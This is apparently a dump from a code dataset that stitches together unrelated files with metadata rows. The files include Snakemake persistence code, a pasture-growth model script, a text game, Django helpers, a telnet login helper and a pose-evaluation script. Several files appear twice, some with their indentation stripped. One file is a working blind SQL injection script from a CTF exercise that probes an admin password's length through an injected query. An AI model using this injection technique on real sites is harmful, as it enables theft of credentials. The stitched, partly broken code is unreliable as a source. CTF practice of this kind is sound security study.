                directory is already locked (and unlock() becomes a no-op).
        """
        self.path = os.path.abspath(".snakemake")
        if not os.path.exists(self.path):
            os.mkdir(self.path)
        self._lockdir = os.path.join(self.path, "locks")
        if not os.path.exists(self._lockdir):
            os.mkdir(self._lockdir)
        self.dag = dag
        # maps lock type ("input"/"output") -> path of the lock file we created
        self._lockfile = dict()
        # per-output-file JSON records about finished jobs
        self._metadata_path = os.path.join(self.path, "metadata")
        # markers for jobs that started but have not finished
        self._incomplete_path = os.path.join(self.path, "incomplete")
        self.conda_env_archive_path = os.path.join(self.path, "conda-archive")
        self.benchmark_path = os.path.join(self.path, "benchmarks")
        if conda_prefix is None:
            self.conda_env_path = os.path.join(self.path, "conda")
        else:
            self.conda_env_path = os.path.abspath(os.path.expanduser(conda_prefix))
        if singularity_prefix is None:
            self.container_img_path = os.path.join(self.path, "singularity")
        else:
            self.container_img_path = os.path.abspath(
                os.path.expanduser(singularity_prefix)
            )
        if shadow_prefix is None:
            self.shadow_path = os.path.join(self.path, "shadow")
        else:
            self.shadow_path = os.path.join(shadow_prefix, "shadow")

        # place to store any auxiliary information needed during a run (e.g. source tarballs)
        self.aux_path = os.path.join(self.path, "auxiliary")

        # migration of .snakemake folder structure
        # The indicator file makes an interrupted migration resumable: it is
        # created before migrating and removed only on success.
        migration_indicator = Path(
            os.path.join(self._incomplete_path, "migration_underway")
        )
        if (
            os.path.exists(self._metadata_path)
            and not os.path.exists(self._incomplete_path)
        ) or migration_indicator.exists():
            os.makedirs(self._incomplete_path, exist_ok=True)
            migration_indicator.touch()

            self.migrate_v1_to_v2()

            migration_indicator.unlink()

        # lazily populated by incomplete(); False means caching is disabled
        self._incomplete_cache = None

        for d in (
            self._metadata_path,
            self._incomplete_path,
            self.shadow_path,
            self.conda_env_archive_path,
            self.conda_env_path,
            self.container_img_path,
            self.aux_path,
        ):
            os.makedirs(d, exist_ok=True)

        # NOTE(review): self._files (read by the `files` property) is not
        # initialized here — confirm it is set elsewhere before first access.
        if nolock:
            self.lock = self.noop
            self.unlock = self.noop
        if warn_only:
            self.lock = self.lock_warn_only
            self.unlock = self.noop

        self._read_record = self._read_record_cached
    def migrate_v1_to_v2(self):
        """Migrate the v1 on-disk layout to v2.

        In v1, incompleteness was a flag inside each metadata record; in v2
        it is a separate marker file under the incomplete folder.  Copy every
        metadata record flagged ``incomplete`` into the mirrored sub-path
        below ``self._incomplete_path``.  Files that are not valid JSON are
        skipped silently; progress is logged every 10000 files because large
        metadata folders can take a while.
        """
        logger.info("Migrating .snakemake folder to new format...")
        i = 0
        for path, _, filenames in os.walk(self._metadata_path):
            path = Path(path)
            for filename in filenames:
                with open(path / filename, "r") as f:
                    try:
                        record = json.load(f)
                    except json.JSONDecodeError:
                        continue  # not a properly formatted JSON file
                if record.get("incomplete", False):
                    # mirror the metadata sub-path below the incomplete folder
                    target_path = Path(self._incomplete_path) / path.relative_to(
                        self._metadata_path
                    )
                    os.makedirs(target_path, exist_ok=True)
                    shutil.copyfile(
                        path / filename,
                        target_path / filename,
                    )
                i += 1
                # this can take a while for large folders...
                if (i % 10000) == 0 and i > 0:
                    logger.info("{} files migrated".format(i))
        logger.info("Migration complete")
    @property
    def files(self):
        """Set of all DAG output files, computed lazily on first access."""
        # NOTE(review): self._files is not initialised in the visible part of
        # __init__ -- confirm it is set to None elsewhere before first access.
        if self._files is None:
            self._files = set(self.dag.output_files)
        return self._files
    @property
    def locked(self):
        """Return True if a foreign lock conflicts with this run.

        A foreign *input* lock conflicts when it names one of our output
        files; a foreign *output* lock conflicts when it names any of our
        input or output files.  Lock files contain one path per line.
        """
        inputfiles = set(self.all_inputfiles())
        outputfiles = set(self.all_outputfiles())
        if os.path.exists(self._lockdir):
            for lockfile in self._locks("input"):
                with open(lockfile) as lock:
                    for f in lock:
                        f = f.strip()
                        if f in outputfiles:
                            return True
            for lockfile in self._locks("output"):
                with open(lockfile) as lock:
                    for f in lock:
                        f = f.strip()
                        if f in outputfiles or f in inputfiles:
                            return True
        return False
    def lock_warn_only(self):
        """Non-fatal variant of lock(): only log a message when the working
        directory is already locked (installed in place of ``lock`` when the
        instance is created with ``warn_only=True``)."""
        if self.locked:
            logger.info(
                "Error: Directory cannot be locked. This usually "
                "means that another Snakemake instance is running on this directory. "
                "Another possibility is that a previous run exited unexpectedly."
            )
    def lock(self):
        """Acquire the input and output locks for this run.

        Raises:
            IOError: if another process already holds a conflicting lock.
        """
        if self.locked:
            raise IOError("Another snakemake process " "has locked this directory.")
        self._lock(self.all_inputfiles(), "input")
        self._lock(self.all_outputfiles(), "output")
def unlock(self, *args):
logger.debug("unlocking")
for lockfile in self._lockfile.values():
try:
logger.debug("removing lock")
os.remove(lockfile)
except OSError as e:
if e.errno != 2: # missing file
raise e
logger.debug("removed all locks")
def cleanup_locks(self):
shutil.rmtree(self._lockdir)
def cleanup_metadata(self, path):
self._delete_record(self._metadata_path, path)
def cleanup_shadow(self):
if os.path.exists(self.shadow_path):
shutil.rmtree(self.shadow_path)
os.mkdir(self.shadow_path)
    def conda_cleanup_envs(self):
        """Delete conda environments and env archives that are not referenced
        by any rule of the current DAG.

        Environments are matched by the first 8 characters of their hash
        (the directory-name prefix); archives by their full content hash.
        """
        # cleanup envs
        in_use = set(env.hash[:8] for env in self.dag.conda_envs.values())
        for d in os.listdir(self.conda_env_path):
            if len(d) >= 8 and d[:8] not in in_use:
                if os.path.isdir(os.path.join(self.conda_env_path, d)):
                    shutil.rmtree(os.path.join(self.conda_env_path, d))
                else:
                    os.remove(os.path.join(self.conda_env_path, d))
        # cleanup env archives
        in_use = set(env.content_hash for env in self.dag.conda_envs.values())
        for d in os.listdir(self.conda_env_archive_path):
            if d not in in_use:
                shutil.rmtree(os.path.join(self.conda_env_archive_path, d))
    def started(self, job, external_jobid=None):
        """Mark every output file of ``job`` as in progress by writing an
        incomplete-marker record (storing the external/cluster job id, if
        any, so it can be reported later)."""
        for f in job.output:
            self._record(
                self._incomplete_path,
                {"external_jobid": external_jobid},
                f,
            )
    def finished(self, job, keep_metadata=True):
        """Record successful completion of ``job``.

        Writes one metadata record per expanded output file (rule version,
        pickled code, inputs, params, shell command, timing, conda env,
        container image) and removes the incomplete marker.  With
        ``keep_metadata=False`` only the incomplete markers are removed.
        """
        if not keep_metadata:
            for f in job.expanded_output:
                self._delete_record(self._incomplete_path, f)
            return

        version = str(job.rule.version) if job.rule.version is not None else None
        code = self._code(job.rule)
        input = self._input(job)
        log = self._log(job)
        params = self._params(job)
        shellcmd = job.shellcmd
        conda_env = self._conda_env(job)
        # used as endtime when the output file does not exist (e.g. remote)
        fallback_time = time.time()
        for f in job.expanded_output:
            # start time is taken from the incomplete marker's mtime
            rec_path = self._record_path(self._incomplete_path, f)
            starttime = os.path.getmtime(rec_path) if os.path.exists(rec_path) else None
            # Sometimes finished is called twice, if so, lookup the previous starttime
            if not os.path.exists(rec_path):
                starttime = self._read_record(self._metadata_path, f).get(
                    "starttime", None
                )
            endtime = f.mtime.local_or_remote() if f.exists else fallback_time
            self._record(
                self._metadata_path,
                {
                    "version": version,
                    "code": code,
                    "rule": job.rule.name,
                    "input": input,
                    "log": log,
                    "params": params,
                    "shellcmd": shellcmd,
                    "incomplete": False,
                    "starttime": starttime,
                    "endtime": endtime,
                    "job_hash": hash(job),
                    "conda_env": conda_env,
                    "container_img_url": job.container_img_url,
                },
                f,
            )
            self._delete_record(self._incomplete_path, f)
    def cleanup(self, job):
        """Drop both the incomplete marker and the metadata record for every
        expanded output file of ``job``."""
        for f in job.expanded_output:
            self._delete_record(self._incomplete_path, f)
            self._delete_record(self._metadata_path, f)
    def incomplete(self, job):
        """Return True if any *existing* output file of ``job`` is marked
        incomplete.

        Uses the cached set of marker paths when available; when the cache
        has been deactivated (``self._incomplete_cache is False``), falls
        back to per-file existence checks on disk.
        """
        if self._incomplete_cache is None:
            self._cache_incomplete_folder()

        if self._incomplete_cache is False:  # cache deactivated

            def marked_incomplete(f):
                return self._exists_record(self._incomplete_path, f)

        else:

            def marked_incomplete(f):
                rec_path = self._record_path(self._incomplete_path, f)
                return rec_path in self._incomplete_cache

        return any(map(lambda f: f.exists and marked_incomplete(f), job.output))
def _cache_incomplete_folder(self):
self._incomplete_cache = {
os.path.join(path, f)
for path, dirnames, filenames in os.walk(self._incomplete_path)
for f in filenames
}
    def external_jobids(self, job):
        """Return the distinct external (cluster) job ids recorded for the
        output files of ``job``.  May contain None for files without a
        recorded id."""
        return list(
            set(
                self._read_record(self._incomplete_path, f).get("external_jobid", None)
                for f in job.output
            )
        )
def metadata(self, path):
return self._read_record(self._metadata_path, path)
def version(self, path):
return self.metadata(path).get("version")
def rule(self, path):
return self.metadata(path).get("rule")
def input(self, path):
return self.metadata(path).get("input")
def log(self, path):
return self.metadata(path).get("log")
def shellcmd(self, path):
return self.metadata(path).get("shellcmd")
def params(self, path):
return self.metadata(path).get("params")
def code(self, path):
return self.metadata(path).get("code")
def version_changed(self, job, file=None):
"""Yields output files with changed versions of bool if file given."""
return _bool_or_gen(self._version_changed, job, file=file)
def code_changed(self, job, file=None):
"""Yields output files with changed code of bool if file given."""
return _bool_or_gen(self._code_changed, job, file=file)
def input_changed(self, job, file=None):
"""Yields output files with changed input of bool if file given."""
return _bool_or_gen(self._input_changed, job, file=file)
def params_changed(self, job, file=None):
"""Yields output files with changed params of bool if file given."""
return _bool_or_gen(self._params_changed, job, file=file)
def _version_changed(self, job, file=None):
assert file is not None
return self.version(file) != job.rule.version
def _code_changed(self, job, file=None):
assert file is not None
return self.code(file) != self._code(job.rule)
def _input_changed(self, job, file=None):
assert file is not None
return self.input(file) != self._input(job)
def _params_changed(self, job, file=None):
assert file is not None
return self.params(file) != self._params(job)
def noop(self, *args):
pass
def _b64id(self, s):
return urlsafe_b64encode(str(s).encode()).decode()
@lru_cache()
def _code(self, rule):
code = rule.run_func.__code__
return b64encode(pickle_code(code)).decode()
@lru_cache()
def _conda_env(self, job):
if job.conda_env:
return b64encode(job.conda_env.content).decode()
@lru_cache()
def _input(self, job):
return sorted(job.input)
@lru_cache()
def _log(self, job):
return sorted(job.log)
@lru_cache()
def _params(self, job):
return sorted(map(repr, job.params))
@lru_cache()
def _output(self, job):
return sorted(job.output)
def _record(self, subject, json_value, id):
recpath = self._record_path(subject, id)
os.makedirs(os.path.dirname(recpath), exist_ok=True)
with open(recpath, "w") as f:
json.dump(json_value, f)
    def _delete_record(self, subject, id):
        """Delete the record for ``id`` below ``subject`` and prune any
        now-empty chunk directories.  A missing file/directory (errno 2) is
        ignored; other OS errors propagate."""
        try:
            recpath = self._record_path(subject, id)
            os.remove(recpath)
            recdirs = os.path.relpath(os.path.dirname(recpath), start=subject)
            if recdirs != ".":
                # NOTE(review): recdirs is computed relative to ``subject`` but
                # passed to os.removedirs unanchored, so it resolves against
                # the current working directory -- confirm this is intended.
                os.removedirs(recdirs)
        except OSError as e:
            if e.errno != 2:  # not missing
                raise e
@lru_cache()
def _read_record_cached(self, subject, id):
return self._read_record_uncached(subject, id)
def _read_record_uncached(self, subject, id):
if not self._exists_record(subject, id):
return dict()
with open(self._record_path(subject, id), "r") as f:
return json.load(f)
def _exists_record(self, subject, id):
return os.path.exists(self._record_path(subject, id))
def _locks(self, type):
return (
f
for f, _ in listfiles(
os.path.join(self._lockdir, "{{n,[0-9]+}}.{}.lock".format(type))
)
if not os.path.isdir(f)
)
def _lock(self, files, type):
for i in count(0):
lockfile = os.path.join(self._lockdir, "{}.{}.lock".format(i, type))
if not os.path.exists(lockfile):
self._lockfile[type] = lockfile
with open(lockfile, "w") as lock:
print(*files, sep="\n", file=lock)
return
    def _record_path(self, subject, id):
        """Map ``id`` to a filesystem path below ``subject``.

        The id is urlsafe-base64 encoded; when the encoding exceeds the
        platform's maximum filename length it is split into directory
        chunks.  Chunk directories are prefixed with '@' (a character that
        cannot occur in base64) so they cannot collide with record files of
        the same name in the same directory.
        """
        max_len = (
            os.pathconf(subject, "PC_NAME_MAX") if os.name == "posix" else 255
        )  # maximum NTFS and FAT32 filename length
        if max_len == 0:
            max_len = 255
        b64id = self._b64id(id)
        # split into chunks of proper length
        b64id = [b64id[i : i + max_len - 1] for i in range(0, len(b64id), max_len - 1)]
        # prepend dirs with @ (does not occur in b64) to avoid conflict with b64-named files in the same dir
        b64id = ["@" + s for s in b64id[:-1]] + [b64id[-1]]
        path = os.path.join(subject, *b64id)
        return path
def all_outputfiles(self):
# we only look at output files that will be updated
return jobfiles(self.dag.needrun_jobs, "output")
def all_inputfiles(self):
# we consider all input files, also of not running jobs
return jobfiles(self.dag.jobs, "input")
def deactivate_cache(self):
self._read_record_cached.cache_clear()
self._read_record = self._read_record_uncached
self._incomplete_cache = False
def _bool_or_gen(func, job, file=None):
    """Apply ``func`` to one file (returning its boolean result) or, when no
    file is given, lazily to every expanded output file of ``job``,
    yielding the files for which ``func`` is true."""
    if file is not None:
        return func(job, file=file)
    return (out for out in job.expanded_output if func(job, file=out))
def pickle_code(code):
    """Serialize a code object into a byte string for change detection.

    Nested code objects in ``co_consts`` (lambdas, comprehensions, inner
    functions) are serialized recursively.  Only the fields relevant for
    detecting behavioural changes are kept: bytecode, variable names,
    constants and referenced names.
    """
    consts = [
        # isinstance instead of type(...) == type(...): same semantics here
        # (code objects cannot be subclassed) and the idiomatic check
        (pickle_code(const) if isinstance(const, type(code)) else const)
        for const in code.co_consts
    ]
    return pickle.dumps((code.co_code, code.co_varnames, consts, code.co_names))
| pt | 0.153437 | 1.741642 | 2 |
Pasture_Growth_Modelling/initialisation_support/dryland_ibasal.py | Komanawa-Solutions-Ltd/SLMACC-2020-CSRA | 0 | 13542 | """
Author: <NAME>
Created: 23/11/2020 11:06 AM
"""
import ksl_env
# add basgra nz functions
ksl_env.add_basgra_nz_path()
from supporting_functions.plotting import plot_multiple_results
from check_basgra_python.support_for_tests import establish_org_input, get_lincoln_broadfield, get_woodward_weather, _clean_harvest
from input_output_keys import matrix_weather_keys_pet
from basgra_python import run_basgra_nz
def run_nonirr_lincoln_low_basil(IBASAL):
    """Run BASGRA for Lincoln (Broadfield weather) without irrigation.

    IBASAL: initial basal area fraction (0-1), used as params['BASALI'].
    Returns the BASGRA output DataFrame with two extra columns:
    per_fc (fraction of field capacity, WAL/WAFC) and
    per_paw (fraction of maximum plant-available water, PAW/MXPAW).
    """
    params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln')

    matrix_weather = get_lincoln_broadfield()
    # irrigation columns are still required by the model even when IRRIGF=0
    matrix_weather.loc[:, 'max_irr'] = 10
    matrix_weather.loc[:, 'irr_trig'] = 0
    matrix_weather.loc[:, 'irr_targ'] = 1

    matrix_weather = matrix_weather.loc[:, matrix_weather_keys_pet]

    params['IRRIGF'] = 0  # no irrigation
    params['BASALI'] = IBASAL  # initial basal area fraction (function argument)

    days_harvest = _clean_harvest(days_harvest,matrix_weather)
    out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False)
    out.loc[:,'per_fc'] = out.loc[:,'WAL']/out.loc[:,'WAFC']
    out.loc[:,'per_paw'] = out.loc[:,'PAW']/out.loc[:,'MXPAW']

    return out
if __name__ == '__main__':
ibasals = [0,0.1,0.15,.2,0.3]
data = {
'IBASAL:{}'.format(e): run_nonirr_lincoln_low_basil(e) for e in ibasals
}
plot_multiple_results(data, out_vars=['BASAL', 'DM', 'YIELD','per_paw'])
| """
Author: <NAME>
Created: 23/11/2020 11:06 AM
"""
import ksl_env
# add basgra nz functions
ksl_env.add_basgra_nz_path()
from supporting_functions.plotting import plot_multiple_results
from check_basgra_python.support_for_tests import establish_org_input, get_lincoln_broadfield, get_woodward_weather, _clean_harvest
from input_output_keys import matrix_weather_keys_pet
from basgra_python import run_basgra_nz
def run_nonirr_lincoln_low_basil(IBASAL):
params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln')
matrix_weather = get_lincoln_broadfield()
matrix_weather.loc[:, 'max_irr'] = 10
matrix_weather.loc[:, 'irr_trig'] = 0
matrix_weather.loc[:, 'irr_targ'] = 1
matrix_weather = matrix_weather.loc[:, matrix_weather_keys_pet]
params['IRRIGF'] = 0 # no irrigation
params['BASALI'] = IBASAL # start at 20% basal
days_harvest = _clean_harvest(days_harvest,matrix_weather)
out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False)
out.loc[:,'per_fc'] = out.loc[:,'WAL']/out.loc[:,'WAFC']
out.loc[:,'per_paw'] = out.loc[:,'PAW']/out.loc[:,'MXPAW']
return out
if __name__ == '__main__':
ibasals = [0,0.1,0.15,.2,0.3]
data = {
'IBASAL:{}'.format(e): run_nonirr_lincoln_low_basil(e) for e in ibasals
}
plot_multiple_results(data, out_vars=['BASAL', 'DM', 'YIELD','per_paw'])
| en | 0.162423 | 2.13499 | 2 |
0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | 0 | 13543 | <reponame>tuannm-1876/sec-exercises<gh_stars>0
import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
    # Blind SQL injection (CTF exercise): probe password lengths 1..99 for
    # user 'admin'.  When the injected LENGTH(pass) comparison is true the
    # server returns the (larger) logged-in page, which is detected via the
    # response's Content-Length header.
    for i in range(1, 100):
        data = {
            "id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
            "pass": "",
        }
        print (data)
        data1 = urllib.urlencode(data).encode("utf-8")
        req = urllib2.Request(url, data1)
        res = urllib2.urlopen(req)
        print (res)
        if int(res.headers["content-length"]) > 2000:
            # response larger than the error page -> the guessed length is right
            print("Do dai cua password: {counter}".format(counter=i))
            break
if __name__ == "__main__":
main() | import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
for i in range(1, 100):
data = {
"id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
"pass": "",
}
print (data)
data1 = urllib.urlencode(data).encode("utf-8")
req = urllib2.Request(url, data1)
res = urllib2.urlopen(req)
print (res)
if int(res.headers["content-length"]) > 2000:
print("Do dai cua password: {counter}".format(counter=i))
break
if __name__ == "__main__":
main() | none | 1 | 3.166893 | 3 |
gen_methods.py | mweeden2/desert_game | 0 | 13544 | # created by <NAME>
# 7/8/16
import classes as c
def printIntro():
print 'Welcome to the\n'
print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\
__________________________\n _\\/\\\\\\////////\\\\\\___________________________________\
______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\
___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\
\\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\
\\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\
\\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \
_\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\
\\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\
__\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\
\\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\
\\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \
_\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\
__\\//\///____'''
print
print 'created by <NAME>\n'
def getUname():
    # Prompt repeatedly until the user enters a name consisting only of
    # ASCII letters and at most 40 characters long; return the valid name.
    done = False
    while not done:
        uname = raw_input("Enter your name: ")
        # subset check: every character of uname must be an ASCII letter
        if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'):
            if len(uname) <= 40:
                done = True
            else:
                print 'Please keep your name to 40 letters or less'
        else:
            print 'Please use only letters in your name'
    return uname
def createPlayer(name):
    # c.Person(mainp [main character or not], name, weight, health, xp)
    # NOTE(review): six positional arguments are passed below but the comment
    # above lists only five parameters -- confirm against c.Person's signature.
    return c.Person(True, name, 150, 10, 100, 0)
def printIntro1(player):
msg = """==================================================
Welcome to the desert, %s.
"To survival." *clink*
"""
print msg % player.getName()
| # created by <NAME>
# 7/8/16
import classes as c
def printIntro():
print 'Welcome to the\n'
print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\
__________________________\n _\\/\\\\\\////////\\\\\\___________________________________\
______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\
___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\
\\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\
\\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\
\\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \
_\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\
\\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\
__\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\
\\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\
\\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \
_\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\
__\\//\///____'''
print
print 'created by <NAME>\n'
def getUname():
done = False
while not done:
uname = raw_input("Enter your name: ")
if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'):
if len(uname) <= 40:
done = True
else:
print 'Please keep your name to 40 letters or less'
else:
print 'Please use only letters in your name'
return uname
def createPlayer(name):
#c.Person(mainp [main character or not], name, weight, health, xp)
return c.Person(True, name, 150, 10, 100, 0)
def printIntro1(player):
msg = """==================================================
Welcome to the desert, %s.
"To survival." *clink*
"""
print msg % player.getName()
| de | 0.29206 | 2.386267 | 2 |
entity_resolution/interfaces/IRecord.py | GeoJamesJones/ArcGIS-Senzing-Prototype | 0 | 13545 | from __future__ import annotations
from abc import ABCMeta, abstractmethod
from typing import Dict, Any, List
class IRecord(metaclass=ABCMeta):
    """Abstract interface for entity-resolution records that can be exported
    in several representations."""

    @abstractmethod
    def to_dict(self) -> Dict[Any, Any]:
        """Return the record as a dictionary."""
        ...

    @abstractmethod
    def to_json(self) -> str:
        """Return the record serialized as a JSON string."""
        ...

    @abstractmethod
    def to_list(self) -> List[Any]:
        """Return the record's values as a list."""
        ...
from abc import ABCMeta, abstractmethod
from typing import Dict, Any, List
class IRecord(metaclass=ABCMeta):
@abstractmethod
def to_dict(self) -> Dict[Any, Any]:
...
@abstractmethod
def to_json(self) -> str:
...
@abstractmethod
def to_list(self) -> List[Any]:
... | none | 1 | 2.913619 | 3 |
mkt/stats/helpers.py | Joergen/zamboni | 0 | 13546 | <filename>mkt/stats/helpers.py
from django.utils.http import urlquote
from jingo import register
import jinja2
from access import acl
@register.function
@jinja2.contextfunction
def check_contrib_stats_perms(context, addon):
    """Return True if the current user may view contribution/revenue stats
    for ``addon``: either an author of the add-on or a holder of the
    RevenueStats:View permission.

    Previously this returned None (implicitly) on failure; an explicit
    boolean is clearer for template use and backward compatible, since
    templates only test truthiness.
    """
    request = context['request']
    return bool(
        addon.has_author(request.amo_user)
        or acl.action_allowed(request, 'RevenueStats', 'View')
    )
@register.function
@jinja2.contextfunction
def stats_url(context, action, metric=None):
    """
    Simplifies the templates a bit, no need to pass in addon into
    parameters as it is inferred from the context and it makes the function
    call shorter.

    If ``metric`` is given, the effective action becomes "<metric>_<action>".
    """
    addon = context['addon']
    if metric:
        action = '%s_%s' % (metric, action)
    return addon.get_stats_url(action=action)
@register.function
def url_quote(url):
    """Template helper: URL-quote ``url`` (thin wrapper around Django's
    urlquote)."""
    return urlquote(url)
| <filename>mkt/stats/helpers.py
from django.utils.http import urlquote
from jingo import register
import jinja2
from access import acl
@register.function
@jinja2.contextfunction
def check_contrib_stats_perms(context, addon):
request = context['request']
if addon.has_author(request.amo_user) or acl.action_allowed(request,
'RevenueStats', 'View'):
return True
@register.function
@jinja2.contextfunction
def stats_url(context, action, metric=None):
"""
Simplifies the templates a bit, no need to pass in addon into
parameters as it is inferred from the context and it makes the function
call shorter.
"""
addon = context['addon']
if metric:
action = '%s_%s' % (metric, action)
return addon.get_stats_url(action=action)
@register.function
def url_quote(url):
return urlquote(url)
| pt | 0.178085 | 2.01001 | 2 |
code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 18 | 13547 | import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
    """Log in to ``ipaddress`` via telnet, enter enable mode, disable paging
    and run ``command`` (bytes), returning the decoded output up to the
    next '#' prompt.
    """
    # bug fix: the host was hard-coded to "192.168.100.1" and the
    # ``ipaddress`` parameter was silently ignored
    t = telnetlib.Telnet(ipaddress)
    t.read_until(b"Username:")
    t.write(username.encode("ascii") + b"\n")
    t.read_until(b"Password:")
    t.write(password.encode("ascii") + b"\n")
    t.write(b"enable\n")
    t.read_until(b"Password:")
    t.write(enable_pass.encode("ascii") + b"\n")
    t.read_until(b"#")
    t.write(b"terminal length 0\n")  # disable paging so output is not chunked
    t.write(command + b"\n")
    time.sleep(1)  # give the device time to produce output
    result = t.read_until(b"#").decode("utf-8")
    return result
| import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
t = telnetlib.Telnet("192.168.100.1")
t.read_until(b"Username:")
t.write(username.encode("ascii") + b"\n")
t.read_until(b"Password:")
t.write(password.encode("ascii") + b"\n")
t.write(b"enable\n")
t.read_until(b"Password:")
t.write(enable_pass.encode("ascii") + b"\n")
t.read_until(b"#")
t.write(b"terminal length 0\n")
t.write(command + b"\n")
time.sleep(1)
result = t.read_until(b"#").decode("utf-8")
return result
| none | 1 | 2.765359 | 3 |
fullstack/migrations/0004_officeholder.py | TylerFisher/full-stack-react | 9 | 13548 | <reponame>TylerFisher/full-stack-react<gh_stars>1-10
# Generated by Django 2.1.5 on 2019-01-27 22:45
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    # Adds the Officeholder model: links a Person to an Office for a term
    # (term_start .. term_end), with a UUID primary key.

    dependencies = [
        ('fullstack', '0003_auto_20190127_2223'),
    ]

    operations = [
        migrations.CreateModel(
            name='Officeholder',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('term_start', models.DateField()),
                ('term_end', models.DateField()),
                ('office', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Office')),
                ('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Person')),
            ],
        ),
    ]
| # Generated by Django 2.1.5 on 2019-01-27 22:45
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('fullstack', '0003_auto_20190127_2223'),
]
operations = [
migrations.CreateModel(
name='Officeholder',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('term_start', models.DateField()),
('term_end', models.DateField()),
('office', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Office')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Person')),
],
),
] | fr | 0.125139 | 1.745507 | 2 |
tools/evaluate_2D.py | ZJULiHongxin/two-hand-pose-est | 0 | 13549 | <reponame>ZJULiHongxin/two-hand-pose-est
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import platform
import numpy as np
import time
import os
import torch
import torch.backends.cudnn as cudnn
import _init_paths
from config import cfg
from config import update_config
from utils.utils import get_model_summary
from ptflops import get_model_complexity_info
from fp16_utils.fp16util import network_to_half
from core.loss import BoneLengthLoss, JointAngleLoss, JointsMSELoss
import dataset
from dataset.build import trans
from models import A2JPoseNet
from utils.misc import plot_performance
import matplotlib
if platform.system() == 'Linux':
matplotlib.use('Agg')
else:
matplotlib.use('Tkagg')
# python evaluate_2D.py --cfg ../experiments/InterHand/exp_test.yaml --model_path ../output/InterHand/exp_test/model_best.pth.tar --gpu 3 --batch_size 32
def parse_args():
    """Parse command-line arguments for 2D evaluation.

    Adds ``--distributed`` (default False): ``main`` reads
    ``args.distributed`` when checking cfg.MODEL.SYNC_BN, but no such
    argument was defined before, which raised AttributeError.
    """
    parser = argparse.ArgumentParser(description='Please specify the mode [training/assessment/predicting]')
    parser.add_argument('--cfg',
                        help='experiment configure file name',
                        required=True,
                        type=str)
    parser.add_argument('opts',
                        help="Modify cfg options using the command-line",
                        default=None,
                        nargs=argparse.REMAINDER)
    parser.add_argument('--gpu',
                        help='gpu id for multiprocessing training',
                        default=-1,
                        type=int)
    parser.add_argument('--world-size',
                        default=1,
                        type=int,
                        help='number of nodes for distributed training')
    parser.add_argument('--distributed',
                        action='store_true',
